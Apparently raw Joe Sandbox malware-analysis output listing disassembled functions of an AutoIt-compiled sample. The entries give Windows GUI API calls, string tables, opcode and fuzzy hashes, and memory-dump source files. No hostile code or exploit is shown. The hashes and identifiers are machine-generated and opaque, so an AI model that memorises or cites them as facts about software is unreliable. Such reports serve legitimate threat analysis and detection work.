                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: BuffCharUpper
                                                                                                                                                        • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                                                        • API String ID: 3964851224-45149045
                                                                                                                                                        • Opcode ID: 237645b647b01f5e65b2bdec72908c0de830b06b1294831e5ebd93f52f043b08
                                                                                                                                                        • Instruction ID: 18874fa0ea75c14db6a58331a9ef4dbb2d21705134f08d10051f12147d351720
                                                                                                                                                        • Opcode Fuzzy Hash: 237645b647b01f5e65b2bdec72908c0de830b06b1294831e5ebd93f52f043b08
                                                                                                                                                        • Instruction Fuzzy Hash: 28C191342042058FCB08EF94C651B7E77E6AF99394F04486CF9869B3D6CB24DD0ACB82
                                                                                                                                                        Function 00AFD385 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetSysColor.USER32(00000012), ref: 00AFD3BE
                                                                                                                                                        • SetTextColor.GDI32(?,?), ref: 00AFD3C2
                                                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00AFD3D8
                                                                                                                                                        • GetSysColor.USER32(0000000F), ref: 00AFD3E3
                                                                                                                                                        • CreateSolidBrush.GDI32(?), ref: 00AFD3E8
                                                                                                                                                        • GetSysColor.USER32(00000011), ref: 00AFD400
                                                                                                                                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00AFD40E
                                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 00AFD41F
                                                                                                                                                        • SetBkColor.GDI32(?,00000000), ref: 00AFD428
                                                                                                                                                        • SelectObject.GDI32(?,?), ref: 00AFD435
                                                                                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00AFD454
                                                                                                                                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00AFD46B
                                                                                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00AFD480
                                                                                                                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00AFD4A8
                                                                                                                                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00AFD4CF
                                                                                                                                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 00AFD4ED
                                                                                                                                                        • DrawFocusRect.USER32(?,?), ref: 00AFD4F8
                                                                                                                                                        • GetSysColor.USER32(00000011), ref: 00AFD506
                                                                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00AFD50E
                                                                                                                                                        • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00AFD522
                                                                                                                                                        • SelectObject.GDI32(?,00AFD0B5), ref: 00AFD539
                                                                                                                                                        • DeleteObject.GDI32(?), ref: 00AFD544
                                                                                                                                                        • SelectObject.GDI32(?,?), ref: 00AFD54A
                                                                                                                                                        • DeleteObject.GDI32(?), ref: 00AFD54F
                                                                                                                                                        • SetTextColor.GDI32(?,?), ref: 00AFD555
                                                                                                                                                        • SetBkColor.GDI32(?,?), ref: 00AFD55F
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1996641542-0
                                                                                                                                                        • Opcode ID: 121d2cd4d000647a2263f6695ca46ce17073d074dc89572947670724f0116e0a
                                                                                                                                                        • Instruction ID: 2e4238f9b1c9f3323ef2f57c0496be0d818a6ec8069aeee6ccba08ddb8c7bde7
                                                                                                                                                        • Opcode Fuzzy Hash: 121d2cd4d000647a2263f6695ca46ce17073d074dc89572947670724f0116e0a
                                                                                                                                                        • Instruction Fuzzy Hash: EF512C71900218BFDF119FA8DC48EEE7BBAFB48320F508515FA15AB2A1DB759A40DB50
                                                                                                                                                        Function 00AFB4D4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00AFB5C0
                                                                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00AFB5D1
                                                                                                                                                        • CharNextW.USER32(0000014E), ref: 00AFB600
                                                                                                                                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00AFB641
                                                                                                                                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00AFB657
                                                                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00AFB668
                                                                                                                                                        • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00AFB685
                                                                                                                                                        • SetWindowTextW.USER32(?,0000014E), ref: 00AFB6D7
                                                                                                                                                        • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00AFB6ED
                                                                                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00AFB71E
                                                                                                                                                        • _memset.LIBCMT ref: 00AFB743
                                                                                                                                                        • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00AFB78C
                                                                                                                                                        • _memset.LIBCMT ref: 00AFB7EB
                                                                                                                                                        • SendMessageW.USER32 ref: 00AFB815
                                                                                                                                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 00AFB86D
                                                                                                                                                        • SendMessageW.USER32(?,0000133D,?,?), ref: 00AFB91A
                                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00AFB93C
                                                                                                                                                        • GetMenuItemInfoW.USER32(?), ref: 00AFB986
                                                                                                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00AFB9B3
                                                                                                                                                        • DrawMenuBar.USER32(?), ref: 00AFB9C2
                                                                                                                                                        • SetWindowTextW.USER32(?,0000014E), ref: 00AFB9EA
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                                                        • String ID: 0
                                                                                                                                                        • API String ID: 1073566785-4108050209
                                                                                                                                                        • Opcode ID: f378a59dcc0cff237804f0ddec12e5f0908ba5adc44a7019416bd2d4ec32bc9e
                                                                                                                                                        • Instruction ID: 6f1dbce223095ecc4b3cc41a724b0eb16557edcd830eec1ece25cc651ad5c7d3
                                                                                                                                                        • Opcode Fuzzy Hash: f378a59dcc0cff237804f0ddec12e5f0908ba5adc44a7019416bd2d4ec32bc9e
                                                                                                                                                        • Instruction Fuzzy Hash: 47E1597591021CAFDB219F94CC84EFE7BB8EF05750F108156FA1AAB291DB748A41DF60
                                                                                                                                                        Function 00AF744C Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetCursorPos.USER32(?), ref: 00AF7587
                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00AF759C
                                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 00AF75A3
                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00AF7605
                                                                                                                                                        • DestroyWindow.USER32(?), ref: 00AF7631
                                                                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00AF765A
                                                                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00AF7678
                                                                                                                                                        • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00AF769E
                                                                                                                                                        • SendMessageW.USER32(?,00000421,?,?), ref: 00AF76B3
                                                                                                                                                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00AF76C6
                                                                                                                                                        • IsWindowVisible.USER32(?), ref: 00AF76E6
                                                                                                                                                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00AF7701
                                                                                                                                                        • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00AF7715
                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00AF772D
                                                                                                                                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 00AF7753
                                                                                                                                                        • GetMonitorInfoW.USER32 ref: 00AF776D
                                                                                                                                                        • CopyRect.USER32(?,?), ref: 00AF7784
                                                                                                                                                        • SendMessageW.USER32(?,00000412,00000000), ref: 00AF77EF
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                        • String ID: ($0$tooltips_class32
                                                                                                                                                        • API String ID: 698492251-4156429822
                                                                                                                                                        • Opcode ID: f5d7b6772d880b077074113cc27ac697aa1dfa3324a6ec3538e82f87503666d2
                                                                                                                                                        • Instruction ID: 338c868e363683a9b6e28cd182664d6c3b323f0139293074de7f12493032396b
                                                                                                                                                        • Opcode Fuzzy Hash: f5d7b6772d880b077074113cc27ac697aa1dfa3324a6ec3538e82f87503666d2
                                                                                                                                                        • Instruction Fuzzy Hash: 96B16B71608345AFDB44DFA8C948B6EBBE5FF88310F00891DF6999B291DB74E805CB91
                                                                                                                                                        Function 00AAA756 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00AAA839
                                                                                                                                                        • GetSystemMetrics.USER32(00000007), ref: 00AAA841
                                                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00AAA86C
                                                                                                                                                        • GetSystemMetrics.USER32(00000008), ref: 00AAA874
                                                                                                                                                        • GetSystemMetrics.USER32(00000004), ref: 00AAA899
                                                                                                                                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00AAA8B6
                                                                                                                                                        • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 00AAA8C6
                                                                                                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00AAA8F9
                                                                                                                                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00AAA90D
                                                                                                                                                        • GetClientRect.USER32(00000000,000000FF), ref: 00AAA92B
                                                                                                                                                        • GetStockObject.GDI32(00000011), ref: 00AAA947
                                                                                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00AAA952
                                                                                                                                                          • Part of subcall function 00AAB736: GetCursorPos.USER32(000000FF), ref: 00AAB749
                                                                                                                                                          • Part of subcall function 00AAB736: ScreenToClient.USER32(00000000,000000FF), ref: 00AAB766
                                                                                                                                                          • Part of subcall function 00AAB736: GetAsyncKeyState.USER32(00000001), ref: 00AAB78B
                                                                                                                                                          • Part of subcall function 00AAB736: GetAsyncKeyState.USER32(00000002), ref: 00AAB799
                                                                                                                                                        • SetTimer.USER32(00000000,00000000,00000028,00AAACEE), ref: 00AAA979
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                        • String ID: AutoIt v3 GUI
                                                                                                                                                        • API String ID: 1458621304-248962490
                                                                                                                                                        • Opcode ID: 493fc18df910c8f6a6df2dad0b65732bdfa7168df14100cb1dae03355a6d4fa4
                                                                                                                                                        • Instruction ID: 89489342781c269393175b33b23d0c50d1abc7b77f890270bb8df0bccaec8e8a
                                                                                                                                                        • Opcode Fuzzy Hash: 493fc18df910c8f6a6df2dad0b65732bdfa7168df14100cb1dae03355a6d4fa4
                                                                                                                                                        • Instruction Fuzzy Hash: 1EB15731A0020AAFDB24DFA8CD85BAE7BF5FB18315F108669FA15A72D0DB74D801CB51
                                                                                                                                                        Function 00AF69C5 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00AF6A52
                                                                                                                                                        • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00AF6B12
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: BuffCharMessageSendUpper
                                                                                                                                                        • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                        • API String ID: 3974292440-719923060
                                                                                                                                                        • Opcode ID: dc998542a2093697bd27ba92ad50b3fb8e3204c7e4f17d1e67779d315aaf00bd
                                                                                                                                                        • Instruction ID: 8b413cd7f9af3604f0bc08d20df0f38349cc4f83262a0afcbb975d78259395cf
                                                                                                                                                        • Opcode Fuzzy Hash: dc998542a2093697bd27ba92ad50b3fb8e3204c7e4f17d1e67779d315aaf00bd
                                                                                                                                                        • Instruction Fuzzy Hash: A1A18E302046059FCB08EF64CA51B7AB3E5FF85364F148969F9A69B2D2DB34ED06CB41
                                                                                                                                                        Function 00ACE69D Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetClassNameW.USER32(00000008,?,00000400), ref: 00ACE6E1
                                                                                                                                                        • _wcscmp.LIBCMT ref: 00ACE6F2
                                                                                                                                                        • GetWindowTextW.USER32(00000001,?,00000400), ref: 00ACE71A
                                                                                                                                                        • CharUpperBuffW.USER32(?,00000000), ref: 00ACE737
                                                                                                                                                        • _wcscmp.LIBCMT ref: 00ACE755
                                                                                                                                                        • _wcsstr.LIBCMT ref: 00ACE766
                                                                                                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00ACE79E
                                                                                                                                                        • _wcscmp.LIBCMT ref: 00ACE7AE
                                                                                                                                                        • GetWindowTextW.USER32(00000002,?,00000400), ref: 00ACE7D5
                                                                                                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00ACE81E
                                                                                                                                                        • _wcscmp.LIBCMT ref: 00ACE82E
                                                                                                                                                        • GetClassNameW.USER32(00000010,?,00000400), ref: 00ACE856
                                                                                                                                                        • GetWindowRect.USER32(00000004,?), ref: 00ACE8BF
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                                                        • String ID: @$ThumbnailClass
                                                                                                                                                        • API String ID: 1788623398-1539354611
                                                                                                                                                        • Opcode ID: 471c5384f9cb6ec7cad3710a29b8fa8033ddba0cfc41ec9d3be5ddc56bd3c4cc
                                                                                                                                                        • Instruction ID: 66435ec029360c130459caa74fb82ca8fe20fb57ff7fbbbc8b10859b6f14cb23
                                                                                                                                                        • Opcode Fuzzy Hash: 471c5384f9cb6ec7cad3710a29b8fa8033ddba0cfc41ec9d3be5ddc56bd3c4cc
                                                                                                                                                        • Instruction Fuzzy Hash: F881AE311083499BDB15CF24C985FAABBE8FF44754F04846EFD899A092EB30DD46CBA1
                                                                                                                                                        Function 00ACE4EA Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __wcsnicmp
                                                                                                                                                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                                                        • API String ID: 1038674560-1810252412
                                                                                                                                                        • Opcode ID: 83d0bce959b846ae3126772df5c3a95f9607577b2eedefbd48ec77a3d0405f15
                                                                                                                                                        • Instruction ID: c45d20553ffa5dd7295dc585fc55a3330c68d607444a5b64c63338bce8437c3f
                                                                                                                                                        • Opcode Fuzzy Hash: 83d0bce959b846ae3126772df5c3a95f9607577b2eedefbd48ec77a3d0405f15
                                                                                                                                                        • Instruction Fuzzy Hash: BA315A31A44209A6DE25EB60DE93FEE73E89F10714FA00469F541710E7FFA1AF04A661
                                                                                                                                                        Function 00ACF898 Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • LoadIconW.USER32(00000063), ref: 00ACF8AB
                                                                                                                                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00ACF8BD
                                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 00ACF8D4
                                                                                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 00ACF8E9
                                                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 00ACF8EF
                                                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00ACF8FF
                                                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 00ACF905
                                                                                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00ACF926
                                                                                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00ACF940
                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00ACF949
                                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 00ACF9B4
                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00ACF9BA
                                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 00ACF9C1
                                                                                                                                                        • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00ACFA0D
                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 00ACFA1A
                                                                                                                                                        • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00ACFA3F
                                                                                                                                                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00ACFA6A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
